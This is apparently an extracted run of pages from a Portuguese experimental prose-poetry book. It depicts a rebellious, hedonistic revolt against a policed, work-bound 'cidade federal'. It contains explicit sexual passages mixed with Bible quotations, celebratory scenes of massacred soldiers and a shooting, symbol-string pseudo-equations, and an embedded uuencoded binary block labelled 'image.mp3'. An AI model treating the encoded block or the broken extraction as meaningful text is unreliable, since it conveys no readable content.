Escapar? Cantemos o mundo! Quando clandestinas, alcançam pontos de vistas impossíveis – galáxias artificiais. Nebulosas animadas por músicas falsas. Bebidas aos naufrágios. Sem preocupações. Sem esconderijos. É como vivem e celebram a vida. Vida imanente, injustificada. Sem instintosnaturais de acomodação. Toda natureza é postiça. Renúncia afetiva da necessidade. Porém primeiro local do mais transparente em termos de excesso. De repente, em alta velocidade, uma nave, sem aço nem jatos, somente energia (E=mc²). Oficiais de rostos prateados. Ray-Bans programados para registrar cenas que não se encaixem em seus grandes livros didáticos. SNI anti-nova-era-glacial-eletrônicaargonáutica. Seres razoáveis e raciocinadores. Contra libidos descontroladas. Contra a grandeza trágica e alegre do acaso. Um

99

passo à frente. Três para trás. Dentre consciências de supremas certezas, o sacrosantolíder do grupo: - Muitas vidas, tu e eu vivemos. De todas elas eu me recordo. Porém tu, não. Olhando para cima: - E quando alguns não vos receberem nem escutarem, saindo dali sacudi o pó dos

vossos pés, em testemunho contra eles. Em verdade vos digo que no dia do Juízo, Sodoma e Gomorra serão tratadas com menos rigor do que essa cidade! Com o pau ereto na mão: - E todo aquele que escandalizar um destes pequenos que crêem em mim, melhor lhe fora que lhe atassem ao pescoço uma pedra de moinho, e que o lançassem ao mar! Untando a mão com vaselina: - Não sabeis vós que sois templo de deus e que o espírito de deus habita em vós? Se alguém, pois, violar o templo de deus, deus o destruirá porque o templo de deus, que sois vós, é sagrado! Friccionando voluptuosamente tantricamente a porra de seu pau: seu cú sacrosantolíder do grupo, contendo

- Bhagavad-Gita; Marcos, VI, 11; Marcos, IX, 42; Paulo, 1º aos Coríntios, III, 16,17!!! Porventura tem deus como justiça do mundo. Ejaculação: hóstias onipotentes jorram em direção de quem voa. Porventura não és anticristo – líquido seminal quanto mais evocado, mais revela a inexistência. Casta. Puritana. Instinto de vingança. Rancor de Parasita sagrado. Angústias eternizadas. Papado. Peccatum originale. Dies nefastus. Cuspida ácida nos rostos de prata. Agitação transcendente. Vida já morta em si mesma. Escotilha aberta. Flutuação a esmo. Substâncias biotecnológicas e outros detritos tóxicos, produção da ganância corporativa. Eles que também são elas: sorrindo timidamente, olhando em volta da cabine, querem nos tirar da inércia. Desenrolando seus desespero metafísicos e ônticos, sem que saíssem de sua boca uma palavra de amor, declaração, promessa, nos expulsam do paraíso. Ora, pensei que fossem dar pelo menos uma choradinha. Porém, calorosamente – o paraíso nunca existiu.

100

Ћ.
Sem remédios, nem linhas de fuga. Inviáveis acessos. Atmosfera asfixiante. Culpas muito bem distribuídas. Democratização da vergonha. Demasiado respeito. Caminho mais curto entre a repressão e a recusa. Ruas retilíneas, largas, extensas axiais, calçadas – trilhas cartesianas rolantes para melhor movimentação de tropas. Grandes conjuntos habitacionais. Catedral, esplanada, palácios, superquadras, compromisso ideológico: EUA. Um proprietário a mais, um revolucionário a menos. Escrituras, fórmulas, pinturas, arquiteturas reservadas. Quanto louvor à autoridade, hierarquia, funcionalidade técnica dos espaços. Eis um plano sem co-piloto: massacre da

Pacheco Fernandes – 1959. Cidade niilista que acredita em tudo. Quanto convite para o retorno ao rebanho. Sombra absoluta em forma de luz. Foi preciso o ritmo epiléptico desse bater de asas grotesco. Ícaro com asas de barata. Foi preciso batê-las, terremotos, catástrofes casuais, artificiais. A existência – geada da manhã. A vida de quem guerreia – orvalho do entardecer. O campo de batalha – a moradia aérea de ligações sexuais clandestinas. Concretos retos de épocas Impossibilidade de idolatria nova.
– –

mortas,

pudicas

e

decentes.

Retomada?

Não lhe serve ser negação – gritavam –, têm que haver objeto para o desejo. Sem ele não há amor.

Vivendo da destruição dos não nascidos. Sem objetos. Só desejos. Amor ao desejo. Desafio o senso do verdadeiro a presentear-me com seus sublimes. Desafio o senso de humanidade a mostrar sua dignidade ao público, às massas. Será inútil. Resistir é inútil. Deleitando com meu cio. Não são dos domínios da psicologia. São da nutrição erótica sem a superstição da arte. Insinuação. Vinho. Poesia abusiva. Revolução repugnante ao ideal consumismo de Marx. Levante obsceno à liturgia anarquista. Rosas de Sodoma embelezam túmulos – a milênios luz – desenhados pela especulação imobiliária. Bela menstruação da aurora embebeda, nós que voamos desenfreadamente. - Alto lá. Piratas. Prostitutas e michês. Matilha sem esperança. Esse espetáculo não é admirável. Proponho a volta. Mitos cantados pelos finos trágicos da Antigüidade. Belos edifícios feitos de espelhos. Músicas que agem sobre serpentes. Até mesmo noções mais sutis e ideais. Sons, ruídos, vibratória. Luz, cores, voyeur. Movimentos extraordinário na vegetação de Ceres – o maior dos asteróides. Sua festa nos presenteia asas grosseiras e óleos perfumados para untar nossos corpos. O agradecimento são crimes gratuitos, disposições sensuais, ilusionismo. A vestimenta – brincos de marfins esverdeados na cabeça de nossos paus e nos lábios de nossas bocetas. Satisfações violentas. Ninguém – piratas, prostitutas, michês, matilha sem esperança – se decepciona. Não há pontos de desgastes – religião, educação escolar e familiar, justiça, cultura. Não há entorpecimentos – administração, governo, exército, política. Há nosso vôo inercial destrutivo. Santifiquem suas propostas: Eis minha maldição. Sua cidade federal, sempre terapêutica mística possível. Sublimação

101

restauradora. Fonte de repetição com efeitos metafísicos. Existência e pensamentos... insignificâncias radicais. Sua racionalização. Quanta coesão. Quanta justificação. Em nome de quem? Preservar da mobilidade? Poupar do artifício? Fugir do acaso? Quanta tristeza. Santifiquem-se: eis minha maldição... Após a ruína. Após a reconstituição. Batendo asas. Horrível, não havia precedentes. Ausente de organização natural. Permissivas e inocentes. É lá. Estão indo. Novo esplendor. Expulsão dos olhos desanimados. Longínquo à lábios ciumentos. Putas sempre. Jamais amantes. Fuga do amor. Abraço ao prazer. À suas sorte! Às suas mais extravagantes felicidades!

102

103

Җ = - δю Ҹ δџ Җ δџ + Ҹ δю = ‫∞ﷲ‬ Ҹ = Ҹ’ + Ҹ” Җ δџ + Ҹ’ δю = ‫∞ﷲ‬ Җ δю + Ҹ” δ љ = ‫∞ﷲ‬

Җ δџ + Ҹ δю + Ұ δ љ = ‫∞ﷲ‬ Ҹ = Ҹ’ + Ҹ” Ұ = Ұ’ + Ұ” Җ δџ + Ҹ’ δю = ‫∞ﷲ‬ Ҹ” δю + Ұ’ δ љ = ‫∞ﷲ‬

Ұ” δ љ + Ҝ δђ = ‫∞ﷲ‬ Җ δџ + Ҹ δю + Ұ δ љ + Ҝ δђ = ‫∞ﷲ‬

ão se consideravam privados de nada – sem culpas, portanto sem punições.

104

Inegável. Nem branco. Nem preto. Nem amarelo. Nem vermelho. Nem amargo. Nem doce. Nem direito. Nem átomos. O real em si se apresenta: fantasmas circundantes em nostálgico labor pela manutenção em formol da idéia de ser. Sem recusa do jogo. Até o capitalismo não evita a brincadeira. Mas quer ser regra e fim. Por hábito, lei e necessidade. Por angústia, produção. Por vingança, publicidade da extrema juventude e beleza. Pilhagens saques improdução terrorismo indolência! Nenhum sentido precedente. Nenhum sentido procedente. Júbilo puro ironia cruel desejos exorcizados! Ama-se ou deixa-se a única fase visível do mundo: (...) A moral secreta dessa alegria ... é também ... eis ...

‫∞ﷲ‬
Җ δџ
Ҝ δђ

Ҹ δю

Ұδљ

- supondo-se que houvesse resultados – o que é inaudito – há pouco deles, decerto – caso mais freqüente – seja como for – pretendia acreditar... Foi assim, desde o fim. Belíssima sala de cristal. Estufa para seres florescerem. Alguma coisa havia. Alguma coisa ouvia. Escritório limpo, vazio. O rumo era a estação rodoespacial. Basta olhar pelas paredes – infinidade de lotações espaciais aterrissando e zarpando. Esbarra-se com um grande relógio – sincronicamente. Há um atraso. Não, há algo que não se encaixa. A cidade se estranha. É a vizinhança. É a família. Há insegurança no caminho. Susto. Descer as escadas – chegar à estação. Descida difícil. Há muitas malas. Há muitos fardos. Quanta esperança se busca? Fora daqui fora daqui. Sem parar sem parar! Indefesa. Por repugnância. Sentar e beber. É possível o engano. Aliás, ir embora. Sem dúvida. Em frente. Cotidiano banal mesquinho. Essas lutas de fronteira que não cessam. São literalmente ordenadas demais. Aterradoramente progressivas. Não por honra. Mas, por medo. Apenas se esconde. Tão frágeis... Há um vale-teletransporte nesse bolso. Fora daqui fora daqui. Sem parar sem parar! Mas essas leis não são reconhecidas universalmente. São segredos dos criadores de hipóteses. O contexto delas são séculos de impressão de ferro e fogo. É preciso informar essas coisas. Melhor, é preciso deformar essas coisas. As costas doem. Há muitas malas. Há muitos fardos. Logo à frente, não circundando: muletas. Quantas formas... quanta irmandade... geriátricas canções fraternas... podem servir à salvações. Sim, à resignação; à redenção. Filosofia: a irmã cansada? Religião: a irmã pudica? Ciência: a irmã caçula? Arte: a irmã grávida? Qual delas é a mais bela? Quero trepar! Com uma, duas ou todas juntas? Bacanal ou amor? Não há atração à distância. Espero o canto. A paixão dos seduzidos! Sem ouvidos tampados. Ódio quando não há sereias. Irmãs velhas em silêncio. De bocas semi abertas. Não há libertinagem que resista a elas. O silêncio penetra em tudo. Todo viajante de pau duro amolece. Toda viajante de boceta molhada resseca. Toda mitopoese engole o próprio rabo. - supondo-se que houvesse resultados – o que é inaudito – há pouco deles, decerto – caso mais freqüente – seja como for – pretendia acreditar... Acreditar que elas cantavam. Pretendia, corri em marchas fracassadas, no entanto, não é mais preciso continuar suportando o fardo.

105

ซ.
A trovejar. A chover. A relampejar. A gear. Anoitecer. Amanhecer. Criança sonho tentador suicida saqueador; água enfurecida. É tarde demais. Para a arte. É tarde demais. Trazer à existência algo que ainda não existia. É tarde demais. Primeiro instante: choque de extremos. Autoaniquilação – não mais natureza; não mais artifício! Acontecimento único. Sem compreender nada, ouvir a eliminação de cada princípio: construção lógica – mística; derivação orgânica – fisiológica. Mas há um perfume... um sabor incrível... próprios poderes e violência Sim, também sinto tal tesão... é preciso destruir as ruínas! Nas profundezas, dentes escovados, cabelos bem cortados, roupas milimetricamente engomadas, mentes transbordantes de estratégias de segurança: uma rede policial universal. Planetas penais; meteoros cometas viaturas; estrelas SNI, luas delegacias: o espectro do poder. O Grande Inquisidor – potência do conforto. A Grande Massa Domesticada – vida cativa. Nas superfícies, um corpo celeste errante sem lendas: o câncer virótico de uma nave natural. Proliferação em todas as dimensões e direções. Desobediência e insubordinação à qualquer código genético. Desforra da religião e da psicologia. Destruição do que vige como regra. Nave carnívora atraindo cosmonautas policiais universais. Imortal, porém sempre nasciente. Factual. Arbitrária. Imprecisa. Sedutora. Sintomas oníricos. Nenhum reino pelo verbo. Das superfícies às profundezas. O câncer virótico da nave natural – arbitrário como decisões paixões desejos terremotos planícies vegetações gravidades inércias – em prontidão, nada vê. Somente as coisas o olham. De rabo de olho, varrem seus relevos interiores – toda sua superfície de absorção. As coisas apenas refletem – refração gêmea. Esgotam-se em seus próprios olhares. Imóveis. Silenciosos. Sem encantos. Revelação? Comunicação? Consciência? Nem confissão nem transparência! Meus prazeres são insolúveis! Sem substância nem origem. Apenas lances de graça e violência! Ouviu-se. Enlouqueceram-se todos que eram passivos e ativos. Ouviu-se, um pouco mais alto. Diarréia em todos regulamentados por leis. Natureza ou valor – quiseram fazer crer nessas economias. Na nave: nunca se sabia o que pensava; nunca se sabia o que desejava. Rede policial universal em vertigem, nauseada. O devir animal mais alto. Nenhum destino. Um urro! Fim do mundo como vontade e representação. É outra lógica. Um crime perfeito. Irônico. Diabólico. Histeria exclusiva da rede. Medo exclusivo policial. Impotência universal.

106

- Oblíquas! Transversais! Antes a obsessão do mesmo! Joguem e não gozem! Apenas finalidades produtivas. Ordem!!! Nossos donos e donas partilham de nossos métodos: aniquilação de naves desviantes! Hahahahahahahhaha!!! Instaurações que nos excluem! Hahahahahahahahahah!!! Somos móveis. Efêmeras. Desafios. Sem além. Nem finitas nem infinitas. Mortais a toda lógica de origem, fim, causa, efeito. Hahahahahahahahahaha!!!!!

E assim, sem história, memória, solidariedade, apenas festa. Todo câncer, em dança, proliferando.

ฌ.
Porém, olhava. Assegurar-se de que há ignorância fundante. Desistir é útil. Ah, meu cansaço – meu preceito moral. Ah, meu coma – minhas obras. Uma casa. Caprichosamente erguida. Leis levadas em consideração: física, engenharia, fisiologia, estética, desejo. Produzida. Determinada. Familiar a qualquer natureza. Móveis – design “viver segundo a”. Quanto conforto – vivere secundum naturam. Regularidade. Plena de deuses. Providência transbordante. Teleológica. Nenhum fruto provisório. Muito o que pensar. Portanto, muita moral a propor. Espelhos, silêncio, impermanência, situações, Don Quixote, são proibidos. Às portas. (Duas enormes portas – quase torres, porém gêmeas.) Inocência suprema – sua realidade se ausenta. De pé, em frente, completamente sem roupas, porém, muita ostentação. Prestígio de aparências ilimitadas. Os olhos, sem prudência, não focalizava tais gêmeas. Muita insolência os guiava. Respiração ofegante. A jornada foi longa. De narinas bastante abertas, agora, descanso. - É só atravessar as portas... um bater gentil... um passo adiante... Às costas. Eventualidades das partidas. Muita previsão. Nenhum domínio. Porém, muita nostalgia. Viver em espectro. Medo e ritmos de cálculos. Esperança.

107

- Há mais disso tudo... é só entrar... sentir-se em casa... um bater gentil... um passo adiante... Rastejar e entrar – roer essas portas. Ou! Insolente, escarnecer, aniquilar?

Tenaz e cruel. Prazeres curtos – nada para além daqui. Imóvel. Nenhum passo. Três passos atrás? Não! Grande salto à frente. Arremesso. Lançar-se. Braços abertos. Feliz choque. Palmo à palmo, a orgia. Duas grandes portasfalos sucumbem em si. Eficiência, hegemonia, previsão, cálculo, cartões de crédito, forças, higiene, vontade de morte, posturas, equivalências, celulares, computadores, ternos e salto altos, demasiadas verdades em implosão. Sim, desistir é útil. De rastejar à democracia. De entrar na purificação dos outros. Quanta saúde a ser recusada! Quanta morte a ser renunciada. Sair do coma! Quanta edificação. Quantas personagens automáticas. Sair do cansaço! Quanta igualdade. Quanta violência do bem e da beleza. Quanta doutrina da vida. Sim, desistir de entrar. Sim, atravessar. Inútil para se ajoelhar. Inútil para preservar. Inútil para integrar. Inútil para a hiper-mega-super-cultura ocidental-oriental. Seguir as trilhas jamais traçadas do inapreensível. Isso... meu pau ejacula, minha boceta se contrai em espasmos, meu cú se delicia! Isso... frivolidades e divertimentos superando a existência e a liberdade. O fim! Sem justificar meios nem começos. O fim! Mundo embasbacado. Nada perdido! Nada a perder! Sem vontade de gerar, de vir a ser. Conspiração!!!!!!!!!!!!!!!!

108

ญ.
“À música do trabalho – a surdez voluntária!” eis a escritura pichada que florescera espalhada pelo lado interior da redoma. Foram enfim desafiados. Elas não poderiam deixar passar. Holofotes de interrogatório apontados. Constranger. Forçar. Identificar. Reprimir por antecipação. Tentavam trazer à luz. Culpabilizar o punho e a holografia. Extinguir todo niilismo do sonho. Desfantasiar a erótica. “Ao espírito trabalhador – auto-desprezo e má consciência!” desta, vez, floresceram pelo lado de fora. A civilização odeia ociosidade. Maldita incubação de antiautoritarismos. O capital ama a concorrência pela sub-vivência. A autoria da escritura deve ser eliminada! Assim decidiram... Da esquerda à direita, da direita à esquerda, leis trabalhistas pendulam. De Marx a Ford, de Ford a Marx, nada mais detestável do que a vida no ócio. A política feita na redoma pendula. Sociedade-trabalho. Sociedade-salário. Sociedade-patronal. Sociedadeproleta. Nervos são esgotados. Não há condições para festas. Exaustão. Para gozos não deliciar. Inquietação sonhar amar odiar são despojados. Volúpia independência vigorosamente impedidas. Princípio moral básico: direito ao trabalho. Solitários ruidosas sem estabilidade, sem ocupação séria, sem vida honesta e organizada, sem salário fixo. A autoria da escritura deve ser eliminada! Assim decidiram... entretanto antes, quem escrevera?

Gritavam: - MALDITA VAGABUNDAGEM NA VIDA! Investigar! Não ignorar. À espreita. Escondido. Intervir no momento decisivo. Muitas ferramentas estratégias tropas estão disponíveis. Cultura história, pacto político leis, mito de uma vontade geral. 1. Calcular a partir de um ponto fixo: o tipo do discurso.

2. Traçar mapas e diagramas: o ecossistema em que falam o dialeto sedutor de jovens. 3. Correção imperiosa: dar identidade e aniquilar. Sábado: concentração de delegados da estocagem de matérias mortas no planeta de São Major Curió; Domingo: ato central de listagem e detecção às margens do oceano Araguaia. Segunda-feira: uma espaçonave. Traz à base seres, sem direitos nem legitimidades, porém, poderosos. Presos. Falavam pouco. Xingavam sempre. Gargalhavam. Cuspes arremessados nos rostos dos oficiais. Acasos em estado livre. Constitucionalmente culpados. Horas depois... da mesma espaçonave, foram levados. Jamais voltaram. Quinta-feira: desceram da mesma espaçonave encapuzadas. Logo, amarradas na casa de comando da base. Interrogatório dos oficiais. Noite adentro. Não há possibilidades de entendimentos. Eles provocaram. Elas provocaram. Tornaram-se causas. Independentes de agressividade natural. Nunca reprimiram, sempre canalizaram desejos para instituições sociais. Burocracias da esperança. Novos símbolos. Novas roupagens. Mesma honestidade. Trabalho honesto. Trabalho forçado. Conformismo. Derrota. Prestação de serviços. Previdência social. Pagamentos para a auto-resignação. Cotas para inativos virem a ser economicamente seres vivos. Manhã de sexta-feira: Canções ilimitadas de poder. Instrumentos musicais para além das intensidades. Danças da dissolução absoluta dos Estados das Fronteiras das Redomas. Tatuagens emergiam em peles quentes. Colares, guirlandas e coroas de flores em auto-oferendas. Pinturas nos dentes, cabelos, unhas, corpos. Vidros solares coloridos. Almofadas e tapetes. Adornos e decorações. Turbantes e cocares. Adereços para as orelhas, paus e bocetas. Perfumes e essências. Jóias e decorações. Magia e bruxaria. Limonadas, refrescos, acidulantes e aguardentes. Sabores extraordinários. Jardinismos e óleos perfumados. Escritas em cifras. Diagramas místico eletrônicos. Poemas, muntras, encantamentos e recreações aritméticas. Acaso impostor! corpos oficiais – após analisar atentamente, todos os casos – não tomaram café. De uniformes verde-oliva e cravados de bala. Poças de sangue fresco brilhavam luxuriosamente. Sargentos, soldadas, quartel inteiro largados num mesmo

109

buraco. Um por cima do outro. Realização ritual do mais belo dos crimes. Da beleza dos artifícios: forças primitivas – Walkíria e Osvaldão – se instauram. Anteriores à natureza e à cultura, desde o fim da história, à revelia da procura imperiosa da necessidade do pacto político entre ociosos e trabalhadores. Seres perigosos. Ferozes. Seres, sem direitos nem legitimidades, agora, seduzidos. Não mais presos. Gargalhavam. Acasos em estado livre. Não mais constitucionalmente culpados. Ora, encapuzadas. Ora, amarradas na casa de comando da base. Agora segredos mistérios, sem confissões transparências.

110

Fim do mundo como trabalho e repressão!

Espere! Olhe! Ainda respiram? A vigilância ainda vive! O que será que farão? Que não cruzem nosso caminho novamente...

111

Sopremos para onde quisermos – errantes e de cabeças turbulentas!

112

escendo pela plataforma do metrô. Rapidez. Não, não, lentidão. Melhor: instantâneo. Agora. No canteiro entre o Centro de Convenções e a Marginal 69. Subitamente lhe direcionam um olhar. Avaliações.

É preciso dar o tiro de misericórdia. Acabar com o último refúgio de deus. É preciso destruir os desejáveis... últimos nascidos dos direitos naturais da ordem e da finalidade. Toda sua liberação está contida nas estratégias de transmutação divina. Usufruto decodificado da lei. Outro lado da rua. Da esquina ao sinal. Para baixo e para cima. Passos largos. 33 anos atrasados. Milênios adiantados. Cálculo errado. Inexato. O tempo sempre como experiências de vaidade. Milênios aplaudidos de pé. Aplausos por uma axiomática. Por uma existência inadequada: essencial. Mas nunca se está onde desejam estar. Nunca se está onde se pensam estar... desejo, pensamento, efeitos de um passado perdido ou de um futuro a instaurar. Ambos se auto-aniquilam. Longos cílios ainda observando. Indiscrição. Níveis. Hierarquias. Profundezas e transcendências. A verdade é o destino. Invulnerabilidade. Inútil se chocar com tal erro. Inútil punir tal crime. Tudo isso não passa de um invocar. É hora do cheque mate. Ahá! Nenhuma quimera de reposição. Correndo. Sem chamar atenções... mas já era tarde. Ternos, saltos altos e colarinhos clericais reconheceram. Respiração ofegante. Entrando no lobby do Shopping Phallus. Inibições. Intimidações. Rangeram os dentes. Sirene ao longe. Tropas que não podem ser vistas nuas. Corpos de ejaculação precoce; de desejos destinados; de imperativos sexuais naturalizados. Sexos em si. Idealizados. Coerentes.

113

No elevador. Cerco feito. Forças dotadas de razão e ordem. - Saia de mãos para cima! Você está cercado. Nosso plano é apenas naturalizar. Tirar todos seres artificiais da fragilidade e da catástrofe. Obedeça à natureza e não lhe faremos mal. Com exatidão. Rajadas de balas. Carne queimada. Órgãos perfurados... correria para ver. Dentro do elevador... não há mais destino. Nenhuma razão para o desejo. Nenhum discurso latente. Vulnerabilidade. Efeitos de uma astúcia. Fracasso de um controle prático. Fracasso de um controle intelectual. Desprovidência. Fora do elevador: medo da indeterminação; horror do presente; sentido determinado. Tudo o que está fora... em coma. Os tiros vieram de dentro. Ainda com a arma na mão. Assassinar corpos que pensam seus desejos. Assassinar corpos que desejam seus pensamentos. Eutanásia. Sem propor em troca uma verdade. Puro poder. Pura potência. Morrer enquanto realidade. Viver enquanto enfeitiçamento. Eis meu desafio. Aposto. Fim de qualquer contrato. Fim de qualquer regulamentado pela lei. Fim de qualquer economia. Adeus desejáveis! Um forte frescor invadiu. Daí uma belíssima atmosfera. Ante a vida? Não ao padecimento? A ditadura da vida se simula. Espelha tudo o que é angústia. Oculta a falta. A vida nada evoca. Sim a morte. Voluptuosamente chama, inflama constitui dilui. Fode com a possibilidade da eternidade, Da infinitude. Viva! Ditam. Como? Antes o destino? Não a auto-implosão?

114

Escolha: viver, não morrer. Mas... Saciar o desejo e viver? Perder a explosão? Eis a paixão: Senti-la, morte?, vida?

Se simula. Separação: perecer sem destino; esperança. padecer vivendo viver padecendo Ilusão irreal Irreal ilusão. Intrincadas flores. Cantos e danças aos ventos no concreto dessa hipercidade cartesiana. Mas sentir se apaixonar a mente limitada é tão insuportável... ₣. O que mata? Sacrifício? Assassinato? Doença? Nada disso! Sim, conferir sentido. Tudo isso. Sentido a qualquer ato, a qualquer viver. Ordens ordinárias. Forjar a ferro e fogo um fardo pesado. Esmagar o factual. Prestar muitas honras ao ser. Ou invocar o rancor pela impermanente duração. Assim saiu da loja de tatuagem e piercing. Seduzir e ser seduzido. Vivo. Tatuagens vazias, sem sentido, absurdas, elípticas, sem referência em todo corpo. Uma tendência singular ao convencional. Piercings brilhando pela negação da anatomia e do corpo como destino. Extraordinário. Simples. Bufônico. Atravessou a rua. Desaparecendo vítima e carrasco.

115

begin 666 image.mp3 M1TE&.#EA@+A`;/_`/___Z6EI4(Y`/__]U)22I24:_?WK??WE%)2(=[>6O?WM,>?G(6MK"+V]"@(`````"P`````@+A`4)R =R[ S^:'UFH>*%8;A@E,MRBL(B".9F)Q+9LW/>]7KL\^GKS6C,3<$TIU!JO8;,^@`"D\MGT8C);#1ED]T4*/&L=T\MEP*["7OY OP2;K?YZW9$&7Z$?W!Z?WMG/H8_1GMTM0#*()MMQ*YI)L.OJA@HV931D)H,=?$K."&["_LZZN"+_7I0HI'*1P6)0IZH8 U3,.0M4,**2OHLE.A'0)F)"?\GBK3QL2'&17@&D=KUT)#%C1QIV9O)1!=ODZ'@M(!4Z2F=W4KF:).\7PO*J$S(X.8<%W> 8<OH`"!F*P@I.FCNHV45U+]1H'M3L3.=3YC)15V[ZO2=6U#/4LU2U6]=ROOHZ:NH&;=L:'''5,SM@/HLWML(N(@W@0+ 618L9#&R"HI5JX,,N;+05H]\KRJ@E4&%"NTCFE0@,$[SIY%MN18MTC)LDQE3O@D94=XUS7IO%AW.%F$&``.2#P#? ("!YP:<.X].';IUZ=:A.P_MO3OW`@$*/#]OOP!`PE<."#GGT,!84IP7V.9Z$9_>5[L[@Y5<F2)N<DM7_M)]",<M8%A?TBF""$ G17%7M+%S]``MZ'B1 WF("Q9C,2!AA(UE$`)8#DVV1F9%9&H1@5<!_(V&5P@@J#'E;M(I81XI%H(TV&4$0L=;9C12X(($)!1$U2(ALV3,53I+&^9R;R56G':!P:G<FG],=RIP!A::W:/QF2?IM`0J0%^FDDT*'Z:0N;BKIH^<)BAV?I"(WWGF25FJII+Z0 %YXN3C2SXQRD@CM1[S16)(MV60_SM$).E_0I1<QSCA3@53!U743G='M.4[?FX'GL&$*"#`.T%,(!^)1"PM+X,/^!L`@+ 2T0!?2:LW,!*/HN`1_A&T"[%)JZ)D.OPD`HGB.RB;%;"K,MJ)N:>FH>J":'"NG*VNFY<J(L8ZHJI92^*D'O3#5#W1,T\N5/JE ;DT>I\EH`8+XJYR]\#B0'9$OC0('.$2?BN<M',,]!#HP%?,0(#!#"+,W/^B[3KNN9[.`;IQH*%[;BJ['T^'<LKEL>SZI9NJM.C/LN ,<BNVV?[50.9?QUNU2\BZ?HTIVY"EE1V]M4`_^USU21A3\YKMTM'K!%%]3=9']$Q,/!SK0Q6!<GLPJ5WI@LC7NWX!J; M"@#?_9X)N9S$._1&.8!=P(!WTEOIM#D6ZSI$J;QUL6<\.*KBF:=VM*/=JVAV,DA"H4WPUGN;*:[K\P'&G*#A@(PMAAW %_.XIT,I06;K7(XIWICT)ZSRL*AT8#(RY0XQK%\)H&IHM^^/,<F@!@MN!@D!SF_&``%0B;X"N;_(I0EPDCM3(A&DK](% @$AHXAL!.#<`M>ZU'<F[:W'+*<,A2XJES>M0;Q4BVIC2Q)1`K;#/&"'XP!2/=#6@+6!(7QS;T"RDS1@\M25EO5(^4?(45IU SM$WTUO6NIZS6@/E#K4BB7Z:!E*=)+V&(/,:.1DM1,M$QUH0U!0%>+)^$L2;XPS'4)HL,>Y?"OMDF="V*%<(=+D:+(`*,U H'DT:L(U1IX^78]=U,J$OZX0'7@+HH.J6<R=4[C%1M/"44HJJC.I>N*9;685W*9&=+6](M`P@X``P>@(^F<$4\K@*5A>0` @6@P'C1M*.;O#+2V992%3(\ZP&:*8'?5<JMQ5@,)VU+*?(R&ON9,'34D(BC]ESSHVP5HISZ\$ECHA594#1C5@I@&S3 OPST7)]M8QLCM%QM24,YF*#1H4Y]<`MJ%*=B/3*7P'.5&B@_2O*3I+.>;$OU)$,CD9^.WM:#NXWSXN"0%L%^&J1 EDB0&H8H%[U5J4JX4FI?%.:@ K-0$,$```[ end

Nada é tão cotidiano! Daquela boca escancarada: dentes à mostra; salivas ao ar; e um ruído corrosivo – ahahahahahahahahahahahahahahahahaha!!!

Ahahaha lançado do abdômen cada vez mais travado. Ahahahahaha criando uma singularidade. Tudo à volta colapsado. Ahahahahahahahaha sem remédios às necessidades. Osteoporose nas velhas causas. Ahahahahahahahahahaha dissolvendo. Ahahahahahahahahahahahahahahaha. Desossada. Desunida. Sem articulação. Emergência. Acidental. Desordem. Sem roupas. Riu-se até se tornar um molusco sedutor. Abusara de toda a potência. Já não suportava o peso do desejo. Organização cíclica – 6hs acordar; 7hs trânsito; 8hs ponto de entrada; 10hs cafezinho; 12hs almoço; 14hs 2º entrada de ponto; 16hs 2º cafezinho; 18hs ponto de saída; 19hs trânsito; 20hs tv; 0h sono... Organização cíclica – acordar, comer, beber, cagar, mijar, dormir; as vezes, masturbação sexo... Organização cíclica – nascer; brincar; estudar; trabalhar; casar; aposentar; extrema unção... Organização cíclica – calendários; agendas; despertadores; relógios de parede pulso biológico; Organização cíclica – entrar em coma. Segundos... horas... dias... semanas... anos... décadas... na melhor das vidas mantidas por aparelhos – tv, computadores, celulares, carros. OU – entrar em coma. Segundos... horas... dias... semanas... anos... décadas... na

116

melhor das vidas mantidas por aparelhos – emprego, cesta básica, lote, bolsa escola, salário mínimo, governos. Organização cíclica – trabalho, férias, carnaval; qual a diferença? Todas cínicas ciladas com fins sexuais organizados. De tudo se ri. Porém, riso contido. Ser feliz por contenção – carnaval. Riso que respeita – corrói apenas a carne. De boca fechada. Educado. Já estava previsto. Datado. Medido. Admissível. Nenhum desafio. Tragicomédia da miséria. Mas há a gargalhada. Já essa... Grossos enrolados até o pescoço. Cabelos fortes. Raízes trançadas. Vivazes

graciosos castanhos. Olhos que não descansavam. Alta. Bem magra. Incansável. Desafio à ordem ingênua da beleza. Pessoas pássaros arbustos insetos. Sua amizade só se estendia. Seu limite: organizações cíclicas. Rodeada. Deveria, mas não podia. Ela faz. Ela pode. Simplesmente o fez. Saltitava entre elas. Não havia raiva. Às organizações cíclicas, a indiferença. Não! Gargalhadas. As organizações estão presentes. Contingentes. Não absurdas. Porém, irrelevantes. Alguns, delas, riem. Mas de cócegas. Já ela, desafio à ordem ingênua da beleza, gargalhava. Factivelmente plena. Era a própria catástrofe da essência humana. História tradição cultura. O mesmo coeficiente de paixão calculada. Riso contido. Pode se rir de tudo. Rir do que quebra o sentido. Mas e aquilo que não faz sentido? Não se ri sendo piada que não se entendeu? Não! Se gargalha. Nunca houve piada. Nem divina, nem transcendente, nem trágica. Antecipação. Ela sabia jogar. Móvel efêmera. Ahahahahahahahahahahahahahaha Nenhuma luta travada. Nenhuma fortaleza edificada. Nenhuma renúncia. Ahahahahahahahahahahahahahaha Somente abandono: moral, deus, tradição, história, existência, razão, desejo, sexo, gozo. Nenhuma referência. O fim de todo cerimonial fixo – sociedade, capitalismo, marxismo, anarquismo, niilismo – instaurado. A acústica era belíssima. Ahahahahahahahahahahahahahaha

117

Җ

Ұ’ δ љ (δџ)
Ҹ’ δю = ‫∞ﷲ‬

Assim, nos perdemos na desordem. Assim, nos perdemos em diversões frívolas e marginais.

118

oava o novo crepúsculo. Brilhos atravessavam a transparência da cúpula. Jóias cintilavam. Sorrisos floresciam. Encerrou-se o habitual papel do âmago. Gestos que nada explicavam. Línguas que ainda muito maldiziam. Incêndios uterinos. Palpitações testíricas. Orifícios penetráveis. Inaudita, volúpia alguma seria. A lascívia só em excesso. Furor luxurioso para calarem. Lubricidade louca como política.

Қ/џқ = џ²ұ - δљ + џδҗ

119
Prazeres insaciados. Não há objetos pensáveis a eles. Porém, muitos crimes a serem cometidos. Jogos guerreiros a instaurar. Pois bem, instaurou-se. Escapou-se da lei. Olhares em chamas. Cabelos desgrenhados. Suspiros. Beijos em fogo. A cama range. Suando de prazer.

Қ/џқ = - δљ

A si mesmo, nem o respeito. Menos ainda o fatalismo do amor. Audácia depravada. Com tudo o que daí decorre... Aos antepassados, declarada a guerra do desprezo. Perigo às suas ruínas. Já não se cega com suas poeiras. Nem mesmo grande neblina.

џδҗ = δљ³

